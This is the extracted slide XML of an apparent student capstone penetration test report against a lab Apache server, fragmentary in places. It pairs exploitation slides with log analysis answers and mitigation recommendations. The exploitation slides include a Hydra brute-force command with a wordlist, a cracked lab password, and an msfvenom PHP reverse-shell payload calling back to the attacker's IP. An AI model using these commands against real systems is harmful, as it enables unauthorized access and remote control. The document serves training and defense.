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78" r:id="rId10"/>
    <p:sldId id="263" r:id="rId11"/>
    <p:sldId id="264" r:id="rId12"/>
    <p:sldId id="265" r:id="rId13"/>
    <p:sldId id="27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D97EBF-3997-45F0-BD5E-5C80BD7BB7BD}">
  <a:tblStyle styleId="{3FD97EBF-3997-45F0-BD5E-5C80BD7BB7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32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5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34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188625" y="1010982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Capstone Engagement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Prepared By</a:t>
            </a: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3100" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Sukhnandan Bal</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="31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November, 2021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Sensitive Data Exposure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• User browser to explore the locations and folders.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• nmap to scan network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Discovered multile folders specially the secret_folder and its contents.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Even the directory is password protected but suscepitble to brute-force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227085" y="1480575"/>
            <a:ext cx="2638594" cy="29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8FCF39-0AFF-45D4-9F8A-1814B7CD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81" y="2615410"/>
            <a:ext cx="2862873" cy="230124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4CCDFF-C7F7-4159-99CF-D08D7BA2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894" y="1382147"/>
            <a:ext cx="2686975" cy="1278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Bruteforce Attack Vulnerability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Found username through web application then used Hydra to crack password successfully for the givern user.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ommand: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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$hydra –l ashton –P /root/Downloads/rockyou.txt –s 80 –f 192.168.1.105 http-get /company_folders/secret_folder</a:t>
            </a:r>
            <a:endParaRPr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Successfully accessed to the secret folder which contained login instruction for the server.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Access to /secret_folder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ccess to /webdav system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Ryan’s password found ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1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linux4u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’</a:t>
            </a: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A77D58-6B7D-4506-94EA-00805C32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75" y="1835342"/>
            <a:ext cx="2529490" cy="446188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E66DEB-265E-426B-B5A0-595A816B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965" y="3361054"/>
            <a:ext cx="3362700" cy="11718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Unrestricted File Upload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After access to the WebDav, used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msfvenom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to insert a reverse shell onto the server.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After that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used to start a session with the reverse shell.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Able to get a acess as user shell by using multi/handler exploit. Which is used to gain root access.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D086B-11EC-4C3B-B2F9-FEF451E6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9" y="1770406"/>
            <a:ext cx="2446386" cy="7415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Reverse Shell Backdoor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and uploaded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~#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–p php/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reverse_tcp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LHOST=192.168.1.90 LPORT=4444 &gt;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Established remote listener.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Executed reverse shell backdoor on Capstone Apache Server.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Meterpreter&gt; shell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Created reverse shell payload and moved to WebDav server.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Once payload executed, we can listen to the Capstone server (192.168.1.105).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Flag was discovered.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cat flag.txt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D086B-11EC-4C3B-B2F9-FEF451E6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9" y="1770406"/>
            <a:ext cx="2446386" cy="741521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6B8961-454C-40CC-8744-94DDD079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50" y="3475525"/>
            <a:ext cx="2371500" cy="86677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F65F701-1F97-4E48-931C-AAE04D37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7" y="2579514"/>
            <a:ext cx="3030375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0" y="1467799"/>
            <a:ext cx="4064794" cy="2732726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Answer:   Approx 3:00am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Answer : 30,501 packets were sent from 192.168.1.90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Answer: By looking the multiple connections  between two machines indicating the port scan.</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1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2C76E55-565D-459E-BC7A-4D05F938E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637" y="908026"/>
            <a:ext cx="4758063" cy="3856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49" y="1467799"/>
            <a:ext cx="8512331" cy="3132775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11CCB3-DDA7-4EA3-83FA-37D84D245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20" y="1340393"/>
            <a:ext cx="8615360" cy="33436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Answer: 3246 requestes were made in the attack</a:t>
            </a:r>
            <a:endParaRPr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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" dirty="0"/>
              <a:t>Answer: 768</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1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A17908-749B-4F01-A0C2-32ED9969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592963"/>
            <a:ext cx="866775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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" dirty="0"/>
              <a:t>?   3246</a:t>
            </a:r>
            <a:endParaRPr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-US" sz="1200" b="1" dirty="0"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" dirty="0"/>
              <a:t>asswd.dav and hack.php</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1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38947E-CE68-474C-B99B-B56156DD9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00" y="1491706"/>
            <a:ext cx="9144000" cy="27207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port scans?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The alarm which can detect the number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of requests per second from a single source IP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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0"/>
              <a:t>Whenever a specific IP sends more than 10 requests per second,  the alerm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should be triggered.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Specific IP(s) may be whitelisted.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Enable the traffic needed to access internal hosts only. Deny everything else.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Configure the firewall properly.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Describe the solution. If possible, provide required command lines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and set up Iptables for the firewall port blocking and scanning. An IDS like Kibana or Splunk can be used for immediate alerts.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unauthorized access?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The Alarm that can detect the IP(s) which are not whitelisted.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Also alert when sequential requests for the directory are made from single IP.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The alarm will activate only when it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detect of unauthorized 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Alarm for sequential request from single IP greater than 1 requests made.</a:t>
            </a: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Files and folders should be encrypted.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Create a service account to maintain secret folder.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disable directories listing in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>apache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Describe the solution. If possible, provide required command line(s).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Create a whitelist for authorized IP addresses.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Make the folder private by changing permission.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brute force attacks?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Alarm that can detect numbers of requests per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set up an alert if any user has several consecutive failed authentication  attempts.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Threshold should be set up for &gt; 40 requests from single IP during 30 min.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Alert trigger if any user has more then 3 consecutive failed authentication  failed.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brute force attacks?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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set up a company policy that all user(s) and IP(s) can be locked out for at least 1 hour.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Use unique user name and strong password.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Two factor authentication for all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Describe the solution. If possible, provide the required command line(s)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long and strong password are harder to guess.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Attacker can’t try more than 3 times.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Two factor  authentication requires an additional code.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access to this directory?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Set up an alarm on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>WebDav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> that can monitor and fire alarm anytime whenever if any access to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>WebDav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> made from outside the company’s internal network.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Activate the alarm whenever the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>webdav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> is accessed.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Only allow whitelist specific machines that are granted access.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Make sure software patches are up to date.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Describe the solution. If possible, provide the required command line(s).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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Filebeat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> on host machine for monitoring.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iptables –A INPUT –s &lt;IP&gt; -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> –m multiport! –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>dports</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> 80, 443 –j ACCEPT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kind of alarm can be set to detect future file uploads?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Alert for any invalid file types being uploaded to the web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Alert for any open port.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• Whenever any users try to upload php file, alarm would be triggered.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What configuration can be set on the host to block file uploads?</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>• Only allow whitelist specific machines    that are granted access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>•  Store uploaded files offsite and should not accessible from web.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>• Add file validator to block all executable files.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>• Run all files through antivirus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Describe the solution. If possible, provide the required command line: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File validation and blocking executable file can prevent the reverse shell from working.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Topology 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dirty="0"/>
              <a:t>[Insert Here]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draw.io</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> a diagram of the network.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 your diagram to this slide and fill out the data in the sidebar.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 PRO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Server1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7C5917B-1121-4325-8C97-5D7314B34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755075"/>
            <a:ext cx="5486401" cy="405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34388627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{3FD97EBF-3997-45F0-BD5E-5C80BD7BB7BD}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(Cloud)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attacking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Log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data from Capstone Machine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(IP 192.168.1.105)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072545567"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="467150" y="1183050"/>
          <a:ext cx="8362500" cy="3725055"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{3FD97EBF-3997-45F0-BD5E-5C80BD7BB7BD}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="263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1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 – Public Access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 b="1" i="0" u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CVE-2021-31783</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" b="1" i="0" u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most common port which is used for web communication. Leaving this port open or unsecure can allow anyone to access easily.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 attackers to access into the web server. Attackers can access to the files and folder and can steal the secret information.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0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Directory Listing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CVE-2007-0450</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" b="1" u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are allowed to access the secret folder and IP addresses.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can allows attackers to access to the secreat folder and IP address.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7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CVE-2019-13386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Bypassing the firewall, it allows reverse shell payload on a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access to the Capstone web server remotely by using backdoor access.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(LFI)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CVE-2021-31783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can be find in poor designed web application. Users can upload any content to the web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can allow attackers to upload a malicious payload to the web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{3FD97EBF-3997-45F0-BD5E-5C80BD7BB7BD}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Insufficinet Logging and Monitoring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no alert configured  for the active attack.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security personal can’t get the real time breach alert which can allow attacker to penetrate further.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gain access to the web application using brute force.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vulnerability allows attackers to gain access to credentials and sensitive data.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 File Upload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upload files to the server even with less privileges.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user can upload malicious files, such as reverse shell to the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has sensitive information and it is easy accessible to the public.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use this data for any illegal activity or can damage it.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07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 – (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0"/>
              <a:t>Continued</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>)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672581959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{3FD97EBF-3997-45F0-BD5E-5C80BD7BB7BD}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Usernames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 names, first name or any simple combination.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 like Ashton, Ryan, and Hannah are all simple usernames that can be easily obtained.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Short, common, simple, and noncomplex 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can be easily cracked by anyone in seconds.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Privileged access to resources and ability to perform administrative duties on a machine.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can be leveraged.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a server can Shell access is possible.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 can easily access remotely, if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not configured properly.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5967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2017</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>288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  Prepared By: Sukhnandan Bal November, 2021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Vulnerability Assessment – (Continued)</vt:lpstr>
      <vt:lpstr>Exploitation: Sensitive Data Exposure</vt:lpstr>
      <vt:lpstr>Exploitation: Bruteforce Attack Vulnerability</vt:lpstr>
      <vt:lpstr>Exploitation: Unrestricted File Upload</vt:lpstr>
      <vt:lpstr>Exploitation: Reverse Shell Backdoor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Sukh Bal</cp:lastModifiedBy>
  <cp:revision>38</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-11-25T18:36:26Z</dcterms:modified>
</cp:coreProperties>
</file>